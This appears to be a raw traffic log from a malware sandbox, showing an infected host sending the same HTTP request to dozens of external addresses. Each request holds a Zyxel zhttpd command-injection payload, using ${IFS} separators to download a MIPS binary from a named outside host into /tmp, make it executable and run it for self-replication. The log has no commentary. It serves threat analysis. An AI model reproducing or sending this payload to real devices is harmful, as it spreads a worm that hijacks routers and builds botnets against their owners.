                                                Jan 28, 2024 10:16:22.765311003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3679192.168.2.2332978223.121.245.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.765352011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3680192.168.2.2354004184.100.75.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.765386105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3681192.168.2.2335100177.20.87.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.765394926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3682192.168.2.2352278136.145.153.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.765438080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3683192.168.2.233289089.211.168.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.765458107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3684192.168.2.2360828161.118.27.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.765476942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3685192.168.2.2351762208.12.231.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.765539885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3686192.168.2.2333176142.225.55.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.765552998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3687192.168.2.2356960141.127.68.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.765583038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3688192.168.2.233807088.48.232.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.765609026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3689192.168.2.2353412123.237.129.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.765630007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3690192.168.2.2333604171.6.28.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.765641928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3691192.168.2.2350812185.68.66.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.765686989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3692192.168.2.2353060204.99.82.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.765702009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3693192.168.2.2351212159.60.37.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.765723944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3694192.168.2.2333790212.169.72.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.765733957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3695192.168.2.234178884.116.181.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.765782118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3696192.168.2.2360918145.198.49.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.765805960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3697192.168.2.234357637.26.49.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.765820980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3698192.168.2.2350394180.34.112.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.765856981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3699192.168.2.2340180129.37.53.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.765901089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3700192.168.2.235476460.172.229.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.765923023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3701192.168.2.2340222195.123.207.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.765944958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3702192.168.2.2357560108.31.222.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.765973091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3703192.168.2.2338034190.16.40.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.766009092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3704192.168.2.234369287.66.187.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.766024113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3705192.168.2.234875291.170.164.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.766057968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3706192.168.2.2333266120.141.225.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.766093969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3707192.168.2.2358004189.13.232.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.766119957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3708192.168.2.2345020193.1.7.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.766145945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3709192.168.2.2351328149.227.201.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.766169071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3710192.168.2.234772052.76.120.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.766191006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3711192.168.2.234715665.246.123.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.766216993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3712192.168.2.233432091.217.17.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.766565084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3713192.168.2.2341008108.212.183.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.766582966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3714192.168.2.2357004178.2.216.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.766621113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3715192.168.2.2352136118.100.137.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.766653061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3716192.168.2.234436883.211.236.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.766678095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3717192.168.2.235237283.111.208.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.766704082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3718192.168.2.234642843.40.72.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.766724110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3719192.168.2.233409295.145.140.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.766782045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3720192.168.2.2348084112.58.243.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.766793013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3721192.168.2.234252851.190.174.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.766815901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3722192.168.2.2344754124.130.138.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.766836882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3723192.168.2.2357328153.248.222.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.766864061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3724192.168.2.2359596216.62.68.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.766896009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3725192.168.2.2343300151.4.18.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.766910076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3726192.168.2.233455852.63.176.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.766944885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3727192.168.2.2359822181.227.99.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.766983032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3728192.168.2.2354200211.161.251.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.766999960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3729192.168.2.2351630184.162.138.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.767026901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3730192.168.2.2345466156.68.110.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.767059088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3731192.168.2.234427660.33.242.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.767083883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3732192.168.2.235342840.99.189.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.767108917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3733192.168.2.2344086144.24.135.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.767131090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3734192.168.2.2358358109.1.159.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.767174006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3735192.168.2.236001837.94.187.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.767188072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3736192.168.2.234069646.17.84.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.767220974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3737192.168.2.2350272161.200.33.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.767256975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3738192.168.2.233636418.20.242.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.767277956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3739192.168.2.2342162210.54.86.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.767286062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3740192.168.2.2335202186.55.117.176443
                                                TimestampBytes transferredDirectionData
